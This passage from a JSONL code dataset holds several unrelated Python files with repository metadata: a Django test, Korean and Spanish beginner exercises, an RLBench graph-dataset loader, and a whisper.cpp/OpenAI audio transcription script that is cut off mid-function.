test_update_related_fields(self):\n \"usertools.helpers.update_related_fields: Update related object fields.\"\n user1 = Author.objects.create(name=\"john\")\n user2 = Author.objects.create(name=\"igor\")\n\n book = Book.objects.create(user=user1, title=\"Igor le labrador\")\n chapter = Chapter.objects.create(user=user1, book=book, number=1)\n \n # update book/chapter for Igor.\n update_related_fields(book, {\"user\": user2.id})\n\n updated_book = user2.book_set.all()[0]\n updated_chapter = user2.chapter_set.all()[0]\n \n # page will not be updated because fieldname is different.\n page = Page.objects.create(author=user2, book=book, \n chapter=updated_chapter, number=1)\n \n # update book/chapter for John.\n update_related_fields(updated_book, {\"user\": user1.id})\n \n self.assertEquals(user2.book_set.all().count(), 0) \n self.assertEquals(user1.book_set.all().count(), 1)\n\n self.assertEquals(user2.chapter_set.all().count(), 0)\n self.assertEquals(user1.chapter_set.all().count(), 1)\n\n self.assertEquals(user2.page_set.all().count(), 1)\n self.assertEquals(user1.page_set.all().count(), 0)","repo_name":"johnboxall/django_usertools","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"10599203448","text":"'''\r\npoint = 0\r\nuinpt = 0\r\nwhile (point < 20):\r\n uinpt = int(input('점수 입력: '))\r\n point = point + uinpt\r\n print(str(uinpt) + '점 추가되었습니다.')\r\nprint(str(point) + '점으로 20점이 넘었어요.')\r\n\r\n#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#_#__#_#_#_#\r\n\r\nstar = 0\r\n\r\nwhile star < 100:\r\n star = star + 1\r\n print('★' + str(star))\r\n\r\n'''\r\n\r\nbasket = 0\r\nsoccer = 0\r\nbaseba = 0\r\n\r\nuserin = ''\r\n\r\nwhile (userin != '3'):\r\n userin = input('농구공[0] 축구공[1] 야구공[2] 종료[3]: ')\r\n if (userin == '0'):\r\n basket = basket + 1\r\n elif (userin == '1'):\r\n soccer = soccer + 1\r\n elif (userin == '2'):\r\n baseba = baseba + 1\r\n elif (userin == '3'):\r\n break\r\n else:\r\n print('잘못된 입력')\r\n\r\nprint('\\n===== [ TOTAL ] =====')\r\nprint('농구공: ' + str(basket) + '개')\r\nprint('축구공: ' + str(soccer) + '개')\r\nprint('야구공: ' + str(baseba) + '개')\r\n\r\n\r\n","repo_name":"dhlife09/pyschool","sub_path":"20201102다트.py","file_name":"20201102다트.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16741447224","text":"'''9) Realizar una clase que administre una agenda. Se debe almacenar para cada\ncontacto el nombre, el teléfono y el email. Además deberá mostrar un menú\ncon las siguientes opciones: Añadir contacto, Listar contactos, Buscar contacto,\nEditar contacto, Cerrar agenda.'''\n\nimport os, re\n\nclass Contacto:\n\n def __init__(self, apellido, nombre, telefono, email):\n self.apellido = apellido\n self.nombre = nombre\n self.telefono = telefono\n self.email = email\n\n def __str__(self):\n return f'Apellido: {self.apellido}\\nNombre: {self.nombre}\\nTelefono: {self.telefono}\\nEmail: {self.email}'\n\n\nclass Agenda:\n\n def __init__(self):\n self.contactos=[]\n\n def __str__(self):\n for contacto in self.contactos:\n print(contacto)\n\n def agregarContacto(self):\n '''Este método pide al usuario que ingrese nombre, telefono y mail del contacto que desea agregar, verificando que los datos ingresados sean válidos. Si los datos son válidos, se crea un objeto del tipo Contacto y se lo agrega a la Agenda.'''\n apellido = input(\"Ingrese el apellido: \").title()\n\n nombre = input(\"Ingrese el nombre: \").title()\n\n entradaTel = input(\"Ingrese el número de teléfono:\")\n\n if re.search('^[0-9]{10}$',entradaTel):#si hay conincidencia entre la entrada y la expresión regular, la entrada es válida\n telefono = int(entradaTel)\n else:\n print(\"Debe ingresar diez caracteres numéricos.\")\n self.agregarContacto()\n\n entradaEmail = input(\"Ingrese la dirección de email:\")\n if re.search('^\\w+([\\.-]?\\w+)*@\\w+([\\.-]?\\w+)*(\\.\\w{2,3})+$',entradaEmail):#si hay conincidencia entre la entrada y la expresión regular, la entrada es válida\n email = entradaEmail\n else:\n print(\"Debe ingresar una dirección de email válida.\")\n self.agregarContacto()\n\n contacto = Contacto(apellido, nombre, telefono, email)\n #print(contacto.__str__())\n\n self.contactos.append(contacto)\n\n def listaContactos(self):\n '''Este método verifica si hay contactos guardados en la agenda. Si hay, la recorre y los muestra por pantalla. Si no hay contactos muestra un mensaje.'''\n\n if len(self.contactos) >0:\n for contacto in self.contactos:\n print('Contacto:')\n print(contacto.__str__())\n print()\n else:\n print(\"No hay contactos guardados en la agenda.\")\n\n\n def buscarContacto(self):\n\n if len(self.contactos) >0:\n apellido =input('Ingrese el apellido del contacto que desea buscar en la agenda: ').title()\n\n nombre =input('Ingrese el nombre del contacto que desea buscar en la agenda: ').title()\n\n for contacto in self.contactos:\n if contacto.apellido == apellido and contacto.nombre == nombre:\n print('Contacto:')\n print(contacto.__str__())\n print()\n else:\n print(f'{apellido}, {nombre} no está almacenado en la agenda.')\n else:\n print(\"No hay contactos guardados en la agenda.\")\n\n\n\n def editarContacto(self):\n\n telValido = False\n emailValido = False\n\n if len(self.contactos) >0:\n apellido =input('Ingrese el apellido del contacto que desea editar: ').title()\n\n nombre =input('Ingrese el nombre del contacto que desea editar: ').title()\n\n for contacto in self.contactos:\n if contacto.apellido == apellido and contacto.nombre == nombre:\n while telValido == False:\n telefono = input(\"Ingrese el número de teléfono:\")\n if re.search('^[0-9]{10}$',telefono):#si hay conincidencia entre la entrada y la expresión regular, la entrada es válida\n contacto.telefono = int(telefono)\n telValido = True\n else:\n print(\"Debe ingresar diez caracteres numéricos.\")\n\n while emailValido == False:\n email = input(\"Ingrese la dirección de email:\")\n if re.search('^\\w+([\\.-]?\\w+)*@\\w+([\\.-]?\\w+)*(\\.\\w{2,3})+$',email):#si hay conincidencia entre la entrada y la expresión regular, la entrada es válida\n contacto.email = email\n emailValido = True\n else:\n print(\"Debe ingresar una dirección de email válida.\")\n\n print('Contacto modificado:')\n print(contacto.__str__())\n print()\n\n else:\n print(\"No hay contactos guardados en la agenda.\")\n\n\n def menu(self):\n #limpiar la pantalla\n '''\n if os.name == \"posix\":\n os.system (\"clear\")\n elif os.name == \"ce\" or os.name == \"nt\" or os.name == \"dos\":\n os.system (\"cls\")'''\n\n entrada = input(\"Ingrese una opción: \\n1: Agregar contacto \\n2: Lista de contactos \\n3: Buscar contacto \\n4: Editar contacto \\n5: Cerrar agenda \")\n\n try:\n opcionNro = int(entrada)\n\n if(opcionNro == 1):\n self.agregarContacto()\n elif(opcionNro == 2):\n self.listaContactos()\n elif(opcionNro == 3):\n self.buscarContacto()\n elif(opcionNro == 4):\n self.editarContacto()\n elif(opcionNro == 5):\n exit()\n else:\n print(\"Debe ingresar un número entero entre 1 y 5\")\n except ValueError:\n print(\"Debe ingresar un número entero.\")\n\n print()\n self.menu()\n\n#MAIN\nagenda=Agenda()\nagenda.menu()\n","repo_name":"TriniBora/CodoACodo-DWFullStackPyhton","sub_path":"Ejercicios/Python/POO/Practica 3/09.py","file_name":"09.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31320144324","text":"import os\nimport glob\nimport json\nimport numpy as np\nimport pickle\nimport random\nimport re\nfrom pyquaternion import Quaternion\n\nimport torch\nfrom torch_geometric.data import Data, DataLoader\n\n# -----------------------------------------------------------------------------------\n# Constants\n# -----------------------------------------------------------------------------------\n\nTARGET_ENC = np.array([1, 0, 0])\nDISTRACT_ENC = np.array([0, 1, 0])\nGRIPPER_ENC = np.array([0, 0, 1])\n\n# -----------------------------------------------------------------------------------\n# Funcs\n# -----------------------------------------------------------------------------------\n\ndef load_npy_to_graph_pl(data_dir, use_relative_position=True):\n \"\"\"Constructs graph dataset from state data numpy matrices.\n Shape: num_episodes * (4 + number of objects) * 7 (usually pose xyz-quaternion except for\n gripper open/close which is padded with 6 zeroes)\n\n Indices: \n 0 - joint positions\n 1 - joint velocities\n 2 - gripper open\n 3 - gripper pose\n\n 4 - target pose\n 5 - distractor pose\n 6 - distractor pose\n \"\"\"\n # TODO: Add gripper open/close into embedding\n # TODO: Deduce number of nodes .npy file\n\n # get all episodes\n pattern = os.path.join(data_dir, \"*/*/*/*.npy\")\n episode_files = glob.glob(pattern)\n\n print(f'Found {len(episode_files)} numpy state data files to load.')\n # construct dataset\n dataset = []\n\n for f_path in episode_files:\n state_data = np.load(f_path)\n\n for k in range(len(state_data) - 1):\n # nodes\n NUM_NODES = 5\n\n gripper_node = np.concatenate([state_data[k][3], GRIPPER_ENC])\n\n if use_relative_position:\n target_block_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][4]),\n TARGET_ENC\n ])\n distract_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][5]),\n DISTRACT_ENC\n ])\n distract2_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][6]),\n DISTRACT_ENC\n ])\n target_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[len(state_data) - 1][3]),\n TARGET_ENC\n ])\n else:\n target_block_node = np.concatenate([\n state_data[k][4],\n TARGET_ENC\n ])\n distract_node = np.concatenate([\n state_data[k][5],\n DISTRACT_ENC\n ])\n distract2_node = np.concatenate([\n state_data[k][6],\n DISTRACT_ENC\n ])\n target_node = np.concatenate([\n state_data[len(state_data)][3],\n TARGET_ENC\n ])\n\n nodes = torch.tensor(\n [target_block_node, distract_node, distract2_node, target_node, gripper_node],\n dtype=torch.float)\n\n # Build edge relationships (Fully Connected)\n edge_index = torch.tensor([[i, j]\n for i in range(NUM_NODES)\n for j in range(NUM_NODES)\n if i != j],\n dtype=torch.long)\n\n # Extract labels from future frame\n delta = delta_in_pose(state_data[k][3], state_data[k + 1][3])\n final_action = np.concatenate([\n delta,\n [state_data[k + 1][2][0]] # gripper\n ])\n y = torch.tensor([final_action], dtype=torch.float)\n\n graph_data = Data(x=nodes,\n edge_index=edge_index.t().contiguous(),\n y=y)\n dataset.append(graph_data)\n\n print(f'Total of {len(dataset)} graphs loaded')\n return dataset\n\n\ndef load_npy_to_graph(data_dir, use_relative_position=True):\n \"\"\"Constructs graph dataset from state data numpy matrices.\n Shape: num_episodes * (4 + number of objects) * 7 (usually pose xyz-quaternion except for\n gripper open/close which is padded with 6 zeroes)\n\n Indices: \n 0 - joint positions\n 1 - joint velocities\n 2 - gripper open\n 3 - gripper pose\n\n 4 - target pose\n 5 - distractor pose\n 6 - distractor pose\n \"\"\"\n # TODO: Add gripper open/close into embedding\n # TODO: Deduce number of nodes .npy file\n\n # get all episodes\n pattern = os.path.join(data_dir, \"*/*/*/*.npy\")\n episode_files = glob.glob(pattern)\n\n print(f'Found {len(episode_files)} numpy state data files to load.')\n # construct dataset\n dataset = []\n\n for f_path in episode_files:\n state_data = np.load(f_path)\n\n for k in range(len(state_data) - 1):\n # nodes\n NUM_NODES = 4\n\n gripper_node = np.concatenate([state_data[k][3], GRIPPER_ENC])\n\n if use_relative_position:\n target_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][4]),\n TARGET_ENC\n ])\n distract_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][5]),\n DISTRACT_ENC\n ])\n distract2_node = np.concatenate([\n delta_in_pose(state_data[k][3], state_data[k][6]),\n DISTRACT_ENC\n ])\n else:\n target_node = np.concatenate([\n state_data[k][3], state_data[k][4],\n TARGET_ENC\n ])\n distract_node = np.concatenate([\n state_data[k][3], state_data[k][5],\n DISTRACT_ENC\n ])\n distract2_node = np.concatenate([\n state_data[k][3], state_data[k][6],\n DISTRACT_ENC\n ])\n\n nodes = torch.tensor(\n [target_node, distract_node, distract2_node, gripper_node],\n dtype=torch.float)\n\n # Build edge relationships (Fully Connected)\n edge_index = torch.tensor([[i, j]\n for i in range(NUM_NODES)\n for j in range(NUM_NODES)\n if i != j],\n dtype=torch.long)\n\n # Extract labels from future frame\n delta = delta_in_pose(state_data[k][3], state_data[k + 1][3])\n y = torch.tensor([delta], dtype=torch.float)\n\n graph_data = Data(x=nodes,\n edge_index=edge_index.t().contiguous(),\n y=y)\n dataset.append(graph_data)\n\n print(f'Total of {len(dataset)} graphs loaded')\n return dataset\n\n\ndef delta_in_pose(pose1, pose2):\n # TODO: Double check this stuff\n # RLbench Pose = X, Y, Z, QX, QY, QZ, QW\n # Quaternions = QW, QX, QY, QZ\n\n q1x, q1y, q1z, q1w = pose1[3:]\n q2x, q2y, q2z, q2w = pose2[3:]\n\n q1 = Quaternion(q1w, q1x, q1y, q1z)\n q2 = Quaternion(q2w, q2x, q2y, q2z)\n\n delta_rot = q2 * q1.inverse\n\n # Normalize to be unit quaternion\n #delta_rot = delta_rot.unit\n qw, qx, qy, qz = list(delta_rot)\n\n x, y, z = pose2[:3] - pose1[:3]\n\n diff = [x, y, z] + [qx, qy, qz, qw]\n\n return np.array(diff)\n\n\ndef split_train_test(dataset, train_ratio=0.8):\n \"\"\"Makes training and testing sets (could extend for validation).\"\"\"\n n = len(dataset)\n n_train = int(n * train_ratio)\n\n random.shuffle(dataset)\n d_train = dataset[:n_train]\n d_test = dataset[n_train:]\n return d_train, d_test\n\n\n# -----------------------------------------------------------------------------------\n# Reach Target\n# -----------------------------------------------------------------------------------\n\ntarget_enc = np.array([1, 0, 0])\ndistract_enc = np.array([0, 1, 0])\ngripper_enc = np.array([0, 0, 1])\n\n\ndef load_data_to_graph(data_dir, use_relative_pos=True):\n \"\"\"Constructs dataset for behavior cloning from JSON dataset.\"\"\"\n # get all episodes\n pattern = os.path.join(data_dir, \"state_data_*.json\")\n episode_files = glob.glob(pattern)\n\n # construct dataset\n dataset = []\n\n for f_path in episode_files:\n with open(f_path, \"r\") as f:\n data = json.load(f)\n obs = data[\"obs\"]\n\n for k in range(data[\"length\"] - 1):\n # nodes\n node_num = len(obs[k])\n\n if use_relative_pos:\n target_node = np.concatenate([\n np.array(obs[k][\"target\"]) - np.array(obs[k][\"tip\"]),\n target_enc\n ])\n distract_node = np.concatenate([\n np.array(obs[k][\"distractor0\"]) - np.array(obs[k][\"tip\"]),\n distract_enc\n ])\n distract2_node = np.concatenate([\n np.array(obs[k][\"distractor1\"]) - np.array(obs[k][\"tip\"]),\n distract_enc\n ])\n gripper_node = np.concatenate(\n [np.array(obs[k][\"tip\"]), gripper_enc])\n else:\n target_node = np.concatenate(\n [np.array(obs[k][\"target\"]), target_enc])\n distract_node = np.concatenate(\n [np.array(obs[k][\"distractor0\"]), distract_enc])\n distract2_node = np.concatenate(\n [np.array(obs[k][\"distractor1\"]), distract_enc])\n gripper_node = np.concatenate(\n [np.array(obs[k][\"tip\"]), gripper_enc])\n\n nodes = torch.tensor(\n [target_node, distract_node, distract2_node, gripper_node],\n dtype=torch.float)\n\n # edges\n edge_index = torch.tensor([[i, j]\n for i in range(node_num)\n for j in range(node_num)\n if i != j],\n dtype=torch.long)\n\n # label\n y = torch.tensor([np.array(obs[k + 1][\"tip\"])], dtype=torch.float)\n\n graph_data = Data(x=nodes,\n edge_index=edge_index.t().contiguous(),\n y=y)\n dataset.append(graph_data)\n\n return dataset\n\n\ndef preprocess_data(data_dir, out_dir):\n \"\"\"Converts raw data from RLBench to desired format.\n\n Use JSON format for easy visualizaing. \n \"\"\"\n os.makedirs(out_dir, exist_ok=True)\n # get all episodes\n pattern = os.path.join(data_dir, \"*/episodes/episode*\")\n episode_dirs = glob.glob(pattern, recursive=True)\n\n for d in episode_dirs:\n # load data\n data_path = os.path.join(d, \"low_dim_obs.pkl\")\n with open(data_path, \"rb\") as f:\n data = pickle.load(f)\n\n # convert data\n formatted_data = {\"obs\": [], \"length\": len(data._observations)}\n\n for obs in data._observations:\n vel = obs.joint_velocities\n state = obs.task_low_dim_state\n\n result = {\n \"target\": state[0].tolist(),\n \"distractor0\": state[1].tolist(),\n \"distractor1\": state[2].tolist(),\n \"tip\": state[3].tolist()\n }\n formatted_data[\"obs\"].append(result)\n\n # save processed data\n variation_match = re.search(r\"variation\\d+\", d)\n variation_num = int(variation_match.group().replace(\"variation\", \"\"))\n episode_match = re.search(r\"episodes/episode\\d+\", d)\n episode_num = int(episode_match.group().replace(\"episodes/episode\", \"\"))\n data_out_path = os.path.join(\n out_dir, \"state_data_{}_{}.json\".format(variation_num, episode_num))\n with open(data_out_path, \"w\") as f:\n json.dump(formatted_data, f, indent=4)\n\n\n# -----------------------------------------------------------------------------------\n# Block Stacking\n# -----------------------------------------------------------------------------------\n\n# -----------------------------------------------------------------------------------\n# Preprocessing only\n# -----------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n data_dir = \"data/reach_target\"\n out_dir = \"data/reach_target_processed\"\n preprocess_data(data_dir, out_dir)\n","repo_name":"StafaH/graph-imitation-learning","sub_path":"src/graphs/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":12782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23043519983","text":"#!/usr/bin/env python3\n\"\"\"\nTranscribe audio livestream or file by feeding ffmpeg output to whisper.cpp or openai at regular intervals\n\nPython implementation by @tarasglek\ninspired by: https://github.com/ggerganov/whisper.cpp/issues/185 https://github.com/ggerganov/whisper.cpp/blob/master/examples/livestream.sh\n\"\"\"\nimport asyncio\nimport datetime\nimport json\nimport math\nimport os\nimport subprocess\nimport sys\nimport argparse\nimport time\nimport logging\nimport pysrt\nfrom typing import List\n\nOPENAI_CONTENT_LENGTH_LIMIT = 26214400\nOVERLAP_SECONDS = 1\n\nFFMPEG_CMD_PREFIX = (\n \"ffmpeg \"\n \"-loglevel error \"\n \"-y \"\n)\nFFMPEG_CONVERT_TO_WAV_CMD = FFMPEG_CMD_PREFIX + (\n \"-noaccurate_seek \"\n \"-i {input_file} \"\n \"-ar 16000 \"\n \"-ac 1 \"\n \"-c:a pcm_s16le \"\n \"-ss {start_time} \"\n \"-t {duration} \"\n \"{output_file}\"\n)\n\nWHISPER_CMD = (\n \"{whisper_path}/main \"\n \"-t {num_cpu} \"\n \"-m {whisper_path}/models/ggml-{model}.bin \"\n \"-f {input_file} \"\n # \"--no-timestamps \"\n \"-osrt \"\n \"--output-file {output_file} \"\n \"--prompt \\\"{prompt}\\\" \"\n)\n\ndef get_extension(filename):\n return os.path.splitext(filename)[1][1:]\n\nasync def extension_for_openai(input_file):\n supported_extensions = ['m4a', 'mp3', 'webm', 'mp4', 'mpga', 'wav', 'mpeg']\n input_extension = get_extension(input_file)\n if input_extension == \"mp4\":\n return \"m4a\"\n elif input_extension == \"oga\":\n return \"webm\"\n if input_extension == \"\":\n # need determine codec\n codec = await probe_codec_with_ffmpeg(input_file)\n if codec == \"aac\":\n return \"m4a\"\n elif codec in [\"vorbis\", \"opus\"]:\n return \"webm\"\n else:\n raise RuntimeError(f\"Can't determine extension for input file {input_file}, codec: {codec}\")\n if input_extension not in supported_extensions:\n raise RuntimeError(f\"Input file extension '{input_extension}' not supported by OpenAI API. Supported extensions: {supported_extensions}\")\n return input_extension\n\ndef gen_ffmpeg_copy_audio_cmd(input_url_or_file: str, output_file:str, read_input_at_native_frame_rate=False, start_time=0, duration=None) -> List[str]:\n cmdls = FFMPEG_CMD_PREFIX.strip().split(' ') + [\n \"-i\",\n input_url_or_file,\n \"-vn\",\n \"-c\",\n \"copy\",\n \"-ss\",\n str(start_time),]\n if read_input_at_native_frame_rate:\n cmdls += [\"-re\"]\n if duration is not None:\n cmdls += [\"-t\", str(duration)]\n cmdls.append(output_file)\n return cmdls\n\nasync def gen_ffmpeg_copy_audio_cmd_for_openai(input_url_or_file: str, output_file:str, start_time=0, duration=None) -> List[str]:\n audio_extensions_supported_by_openai = ['m4a', 'mp3', 'mpga', 'wav']\n extension = get_extension(output_file)\n if extension in audio_extensions_supported_by_openai:\n return gen_ffmpeg_copy_audio_cmd(input_url_or_file, output_file, start_time=start_time, duration=duration)\n\n # for webm we strip actual video and add dummy tiny video stream\n ext2codec_encoder = {\n 'webm': 'libvpx',\n }\n encoder = ext2codec_encoder.get(extension)\n if encoder is None:\n raise RuntimeError(f\"Can't find encoder for extension: {extension}\")\n\n # ffmpeg -i samples/LeavingmystartupjobtobuildcreateandexperimentIfEs8EnTZKQ.webm -f lavfi -i color=c=black:s=1x1 -map 0:a -map 1:v -c:a copy -c:v libvpx -b:v 1M output.webm\n cmdls = FFMPEG_CMD_PREFIX.strip().split(' ') + [\n \"-i\",\n input_url_or_file,\n \"-f\",\n \"lavfi\",\n \"-i\",\n \"color=c=black:s=2x2\",\n \"-map\",\n \"0:a\",\n \"-map\",\n \"1:v\",\n \"-c:a\",\n \"copy\",\n \"-c:v\",\n encoder,\n \"-b:v\",\n \"500k\",\n \"-ss\",\n str(start_time),]\n\n if duration is not None:\n cmdls += [\"-t\", str(duration)]\n cmdls.append(output_file)\n return cmdls\n\nasync def run_command_unsafe(cmd):\n start_time = time.time()\n process = await asyncio.create_subprocess_shell(\n cmd,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE\n )\n\n stdout, stderr = await process.communicate()\n end_time = time.time()\n logging.debug(f\"Command '{cmd}' ran in {end_time - start_time} seconds\", )\n if process.returncode != 0:\n if len(stdout) > 0:\n logging.error(\"stdout:\" + stdout.decode())\n logging.error(\"stderr:\" + stderr.decode())\n raise subprocess.CalledProcessError(process.returncode, cmd, stdout, stderr)\n return stdout.decode()\n\n\"\"\"\nRuns background process, allows it to be cancelled\n\"\"\"\nasync def run_process_background(cmd, *args):\n process = await asyncio.create_subprocess_exec(cmd, *args,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE)\n logging.debug(f\"Running process '{' '.join([cmd] + list(args))}' in background as pid {process.pid}\")\n process.killed = False\n async def monitor_process():\n stdout, stderr = await process.communicate()\n\n if process.returncode != 0 and not process.killed:\n error_msg = f\"Process '{' '.join([cmd] + list(args))}' failed with return code {process.returncode}\"\n logging.error(error_msg)\n if len(stdout) > 0:\n logging.error(f\"stdout: {stdout.decode().strip()}\")\n logging.error(f\"stderr: {stderr.decode().strip()}\")\n raise RuntimeError(error_msg)\n return asyncio.create_task(monitor_process()), process\n\nasync def default_get_birth_time(file_path):\n loop = asyncio.get_event_loop()\n try:\n stat = await loop.run_in_executor(None, os.stat, file_path)\n return stat.st_birthtime\n except AttributeError:\n return 0\n\nasync def ffmpeg_get_duration(filename: str):\n \"\"\"\n @returns duration in seconds\n @raises ValueError if unable to get duration\n \"\"\"\n duration = await run_command_unsafe(f\"ffprobe -i {filename} -show_entries format=duration -v quiet -of csv=p=0\")\n logging.debug(f\"Duration of {filename} is {duration} seconds\")\n duration = int(float(duration))\n return duration\n\ndef time_to_seconds(time_obj: datetime.time):\n return time_obj.hour * 3600 + time_obj.minute * 60 + time_obj.second + time_obj.microsecond / 1e6\n\ndef srt_trim_last(srt_file: str, end_of_file_seconds: float):\n \"\"\"\n Used to give context from one subtitle chunk to next. \n We assume that last thing said in srt was incomplete and overlap that on next iteration of whisper\n @returns last prompt(that was kept), start_seconds to start next transcription at\n \"\"\"\n subs: pysrt.SubRipFile = pysrt.open(srt_file)\n last_prompt = None\n start_seconds = end_of_file_seconds\n end_seconds = end_of_file_seconds\n if len(subs) > 1:\n # get time in seconds of start of subtitle\n last_sub = subs[-1]\n sub_start_seconds = time_to_seconds(last_sub.start.to_time())\n sub_end_seconds = time_to_seconds(last_sub.end.to_time())\n # if last subtitle is more than 1 second before end of file, then we assume it was complete\n if end_of_file_seconds - end_seconds <= 1:\n start_seconds = sub_start_seconds\n end_seconds = sub_end_seconds\n # remove last subtitle cos we gonna re-transcribe it\n logging.debug(f\"Removing {last_sub.start}-{last_sub.end}:{json.dumps(last_sub.text)} from {srt_file} for clean overlap\")\n subs.pop(-1)\n subs.clean_indexes()\n subs.save(srt_file, encoding='utf-8')\n if len(subs) > 0:\n last_sub = subs[-1]\n last_prompt = str(last_sub.text)\n return last_prompt, start_seconds\n \ndef append_srt_file(srt_file_from_0, offset_s, srt_file_to_add):\n \"\"\"\n use pysrt to append srt_file_to_add to srt_file_from_0 after adjusting timestamps in srt_file_to_add by offset_s\n \"\"\"\n subs_0 = pysrt.open(srt_file_from_0)\n subs_to_add = pysrt.open(srt_file_to_add)\n\n for sub in subs_to_add:\n sub.start += pysrt.SubRipTime(seconds=offset_s)\n sub.end += pysrt.SubRipTime(seconds=offset_s)\n subs_0.append(sub)\n\n subs_0.clean_indexes()\n subs_0.save(srt_file_from_0, encoding='utf-8')\n\nasync def transcribe(params, get_birth_time=default_get_birth_time):\n model = params.get('model')\n whisper_path = params.get('whisper_path')\n input_file = params.get('input_file')\n output_file = params.get('output_file')\n num_cpu = params.get('num_cpu')\n use_openai_api = params.get('use_openai_api')\n follow_stream = params.get('follow_stream')\n tmp_audio_chunk_file = f\"/tmp/whisper-live.{await extension_for_openai(input_file) if use_openai_api else 'wav'}\"\n chunk_duration_s = params.get('step_s')\n input_duration = 0 if follow_stream else await ffmpeg_get_duration(input_file)\n if not chunk_duration_s:\n if follow_stream or not use_openai_api:\n chunk_duration_s = 30\n else:\n chunk_duration_s = input_duration\n\n logging.info(f\"json: {json.dumps(params)}\")\n start_time = float(0)\n prompt=\"\"\n old_creation_ts = 0\n running = True\n while running:\n file_creation_ts_in_unixtime_ms = await get_birth_time(input_file)\n if file_creation_ts_in_unixtime_ms != old_creation_ts:\n logging.info(f\"File {input_file} was modified at {file_creation_ts_in_unixtime_ms}. Reading from beginning...\")\n old_creation_ts = file_creation_ts_in_unixtime_ms\n start_time = float(0)\n prompt = \"\"\n try:\n os.remove(tmp_audio_chunk_file)\n except OSError:\n pass\n if use_openai_api:\n cmd = ' '.join(await gen_ffmpeg_copy_audio_cmd_for_openai(\n input_url_or_file=input_file,\n output_file=tmp_audio_chunk_file,\n start_time=start_time,\n duration=chunk_duration_s))\n else:\n cmd = FFMPEG_CONVERT_TO_WAV_CMD.format(\n start_time=start_time,\n duration=chunk_duration_s,\n input_file=input_file,\n output_file=tmp_audio_chunk_file\n )\n try:\n await run_command_unsafe(cmd)\n except subprocess.CalledProcessError as e:\n if e.stderr.decode().strip().endswith(\"End of file\") or int(start_time) == 0:\n logging.info(f\"Waiting {chunk_duration_s}s for {input_file} file to get more audio...\")\n await asyncio.sleep(chunk_duration_s)\n continue\n else:\n raise e\n\n try:\n tmp_duration = await ffmpeg_get_duration(tmp_audio_chunk_file)\n logging.debug(f\"Got {tmp_duration} seconds of audio in {tmp_audio_chunk_file}\")\n except ValueError:\n logging.error(f\"ffmpeg failed to get duration of {tmp_audio_chunk_file}\")\n if not follow_stream:\n raise RuntimeError(f\"ffmpeg failed to get duration of {tmp_audio_chunk_file}\")\n tmp_duration = 0\n file_size = 0\n if use_openai_api:\n file_size = os.path.getsize(tmp_audio_chunk_file)\n logging.debug(f\"Got {file_size} bytes of audio in {tmp_audio_chunk_file}\")\n if file_size > OPENAI_CONTENT_LENGTH_LIMIT:\n logging.info(f\"Audio file {tmp_audio_chunk_file} is larger than limit of {OPENAI_CONTENT_LENGTH_LIMIT} bytes\")\n too_big_ratio = math.ceil(file_size / OPENAI_CONTENT_LENGTH_LIMIT)\n old_step_s = chunk_duration_s\n chunk_duration_s = math.floor(chunk_duration_s / too_big_ratio) - 1\n logging.info(f\"Reducing chunk_duration_s from {old_step_s} to {chunk_duration_s} seconds based on file size overshoot\")\n continue\n\n if tmp_duration < chunk_duration_s:\n if follow_stream:\n logging.info(f\"Not enough audio in {input_file} yet. Got {tmp_duration}/{chunk_duration_s}, waiting {chunk_duration_s-tmp_duration} seconds...\")\n await asyncio.sleep(chunk_duration_s - tmp_duration)\n continue\n else:\n running = False\n\n tmp_output_file = os.path.join(os.path.dirname(output_file), f\"whisper-live-{start_time}\")\n if use_openai_api:\n tmp_output_file += \".srt\"\n import openai\n with open(tmp_audio_chunk_file, \"rb\") as f:\n openai_start_time = time.time()\n transcript = openai.Audio.transcribe(\"whisper-1\", f, response_format=\"srt\", prompt=prompt)\n elapsed_time = time.time() - openai_start_time\n logging.debug(f\"Transcribed {tmp_audio_chunk_file} in {elapsed_time} seconds. Speedup: {chunk_duration_s / elapsed_time}. Throughput: {file_size / elapsed_time} bytes per second\")\n # print(transcript)\n # yield {\"output\": transcript}\n with open(tmp_output_file, \"w\") as f:\n f.write(transcript)\n logging.debug(f\"wrote {tmp_output_file}\")\n else:\n cmd = WHISPER_CMD.format(\n model=model,\n num_cpu=num_cpu,\n input_file=tmp_audio_chunk_file,\n whisper_path=whisper_path,\n output_file=tmp_output_file,\n prompt=prompt,\n )\n output = await run_command_unsafe(cmd)\n tmp_output_file += \".srt\"\n if int(start_time) == 0:\n logging.debug(f\"Renaming {tmp_output_file} to {output_file}\")\n os.rename(tmp_output_file, output_file)\n else:\n logging.debug(f\"Appending {tmp_output_file} to {output_file}\")\n append_srt_file(output_file, start_time, tmp_output_file)\n logging.debug(f\"Removing {tmp_output_file}\")\n os.remove(tmp_output_file)\n\n\n start_time += chunk_duration_s\n if input_duration and (start_time >= input_duration):\n running = False\n logging.info(f\"Successfully transcribed {start_time}/{input_duration} seconds of {input_file}\")\n else:\n prompt, start_time = srt_trim_last(output_file, start_time)\n yield {\"output_file\": output_file, \"end_time_s\": start_time, \"duration_s\": input_duration}\n\ndef argparser():\n URL = \"http://a.files.bbci.co.uk/media/live/manifesto/audio/simulcast/hls/nonuk/sbr_low/ak/bbc_world_service.m3u8\"\n MODEL = \"base.en\"\n WHISPER_PATH = \".\"\n NUM_CPU = 4\n parser = argparse.ArgumentParser(description='Transcribe audio livestream by feeding ffmpeg output to whisper.cpp at regular intervals')\n 